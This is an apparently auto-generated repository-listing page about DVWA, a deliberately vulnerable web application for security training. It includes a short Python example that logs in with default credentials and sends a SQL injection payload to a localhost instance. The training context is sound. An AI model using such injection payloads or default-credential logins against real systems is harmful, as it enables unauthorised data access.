~/trending
~$PIMONO24.1%~$OPENCLAW15.6%~$ZVEC55.9%~$CLAUDECO5.1%~$HERETIC15.2%~$ROWBOAT12.7%~$GOGCLI19.8%~$CODEXCLI2.3%~$CONTEXT72.5%~$SUMMARIZ19.5%~$PIMONO24.1%~$OPENCLAW15.6%~$ZVEC55.9%~$CLAUDECO5.1%~$HERETIC15.2%~$ROWBOAT12.7%~$GOGCLI19.8%~$CODEXCLI2.3%~$CONTEXT72.5%~$SUMMARIZ19.5%
live
Navigate:
DVWA
~$DVWA0.4%

DVWA: Deliberately vulnerable web application for security training

PHP/MariaDB training platform for web security exploitation practice.

LIVE RANKINGS • 11:31 AM • STEADY
OVERALL
#196
56
SECURITY
#18
1
30 DAY RANKING TREND
ovr#196
·Secur#18
STARS
12.6K
FORKS
4.6K
7D STARS
+50
7D FORKS
+26
Tags:
Security
See Repo:
Share:

Learn more about DVWA

DVWA is a PHP-based web application backed by MariaDB that contains documented and undocumented security vulnerabilities across multiple difficulty levels. The application runs on standard web server stacks like XAMPP and is designed to be deployed in isolated environments such as virtual machines with NAT networking. It implements common web vulnerabilities including SQL injection, cross-site scripting, authentication bypass, and other OWASP-related issues with adjustable complexity settings. The tool serves as a practice platform for security professionals, developers learning secure coding practices, and students in classroom settings studying web application security.

DVWA
1

Adjustable Difficulty Levels

Vulnerabilities scale across multiple difficulty settings from low to high complexity. Enables progressive learning paths for beginners through advanced security practitioners without requiring separate environments.

2

Undocumented Vulnerability Discovery

Contains intentional security flaws beyond the documented exercises, requiring active reconnaissance and analysis. Simulates real-world penetration testing scenarios where not all vulnerabilities are explicitly cataloged.

3

Isolated Deployment Model

Architected exclusively for VM-based isolated environments with explicit network isolation requirements. Prevents accidental internet exposure of vulnerable code through clear deployment constraints and security warnings.

import requests

# Test SQL injection vulnerability (low security)
session = requests.Session()
login_data = {'username': 'admin', 'password': 'password', 'Login': 'Login'}
session.post('http://localhost/DVWA/login.php', data=login_data)

# Exploit SQLi to extract data
payload = "1' OR '1'='1"
response = session.get('http://localhost/DVWA/vulnerabilities/sqli/', params={'id': payload, 'Submit': 'Submit'})
print(response.text)

Top in Security

1

Ghidra

65,041
2

PentestGPT

11,792
3

Gitleaks

25,126
4

FingerprintJS

26,656
5

CAI

7,236
See all →

Trending Repos

1

Pi Mono

17,222#1
2

OpenClaw

233,443#2
3

Zvec

8,089#3
4

Claude Code

70,649#4
5

Heretic

9,761#5
See all →
[ EXPLORE MORE ]

Related Repositories

Discover similar tools and frameworks used by developers

DOMPurify

DOM-based XSS sanitizer using native browser parsing.

16,674826

Mobile-Security-Framework-MobSF

Automated pen-testing for Android, iOS, and Windows applications.

20,4713,599

PentestGPT

AI-assisted Python framework for automated security testing.

11,7921,996

Subfinder

Passive subdomain discovery via DNS resolution and validation.

13,1441,512

Semgrep

Pattern-based code scanner for 30+ languages.

14,271876